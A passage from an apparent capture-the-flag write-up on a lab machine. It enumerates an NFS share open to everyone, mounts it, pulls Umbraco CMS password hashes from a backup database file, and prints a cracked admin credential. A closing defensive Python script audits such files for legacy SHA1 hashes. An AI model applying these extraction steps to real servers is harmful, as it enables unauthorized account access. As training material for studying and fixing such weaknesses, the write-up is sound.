NFS - 2049
showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
Mounting it to our machine:
mkdir nfs
sudo mount -t nfs 10.10.10.180:/ ./nfs -o nolock
Viewing contents:
┌──(anonmak9㉿anonmak9)-[~/Desktop/remote/nfs/site_backups]
└─$ ls
App_Browsers App_Data App_Plugins aspnet_client bin Config css default.aspx Global.asax Media scripts Umbraco Umbraco_Client Views Web.config
We see there is Umbraco, which is a CMS, the one running on port 80.
It was my first time seeing this CMS, so I went to Google to find where Umbraco keeps credentials, and I found that they are in the App_Data folder from this StackOverflow post. It also mentions the Umbraco.sdf file. Running file on it:
file Umbraco.sdf
Umbraco.sdf: data
Contents of the .sdf file found from conversion:
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
[email protected]{"hashAlgorithm":"SHA1"}[email protected]
[{"alias":"umbIntroIntroduction","completed":false,"disabled":true}]
[email protected]==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
[email protected]==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}[email protected]
[email protected]+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}[email protected]
Looks like we got some admin user hash in SHA1 format:
We get our first pair of credentials: [email protected]:baconandcheese
We also got another user, smith, whose hash is in HMACSHA256 format.
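To check a backup copy of Umbraco.sdf for accounts still on the legacy SHA1 setting, the sketch below scans the file's printable strings for the hashAlgorithm markers seen in the dump above and reports them without printing any digests. It is an added example, not code from this writeup or from Umbraco; the function name `audit_hash_markers`, the `WEAK` set, the constructed sample bytes and the assumed record layout (digest immediately before the marker) are assumptions.

```python
import re

# Printable ASCII runs of 6+ bytes, the same idea as the `strings` utility.
PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")
# Marker as it appears in the dump, e.g. {"hashAlgorithm":"SHA1"}
MARKER = re.compile(rb'\{"hashAlgorithm":"([A-Za-z0-9]+)"\}')
# A bare 40-hex-character value directly before the marker.
HEX40_TAIL = re.compile(rb"[0-9a-fA-F]{40}$")
# Assumption: algorithms treated as legacy for reporting purposes.
WEAK = {"SHA1", "MD5"}


def audit_hash_markers(blob: bytes) -> list[dict]:
    """Report every hashAlgorithm marker in a binary blob, without digests."""
    findings = []
    for run in PRINTABLE.finditer(blob):
        text = run.group()
        for m in MARKER.finditer(text):
            algo = m.group(1).decode("ascii")
            findings.append({
                # Byte offset of the marker inside the file, for follow-up.
                "offset": run.start() + m.start(),
                "algorithm": algo,
                "weak": algo.upper() in WEAK,
                # True when a 40-hex value sits right before the marker.
                "bare_hex_digest": bool(HEX40_TAIL.search(text[:m.start()])),
            })
    return findings


# Constructed sample mimicking the layout in the dump (placeholder values).
SAMPLE = (
    b"\x00\x01Administratoradmin" + b"0f" * 20
    + b'{"hashAlgorithm":"SHA1"}en-US\x00\x00'
    + b"smithc2FsdHNhbHQ=ZGlnZXN0ZGlnZXN0"
    + b'{"hashAlgorithm":"HMACSHA256"}\x00'
)

if __name__ == "__main__":
    for f in audit_hash_markers(SAMPLE):
        flag = "LEGACY" if f["weak"] else "ok"
        print(f'{f["offset"]:#08x}  {f["algorithm"]:<12} {flag}')
```

Any record flagged LEGACY is a candidate for a forced password reset and a rehash under the stronger algorithm, and the backup holding it should not sit on a share exported to everyone.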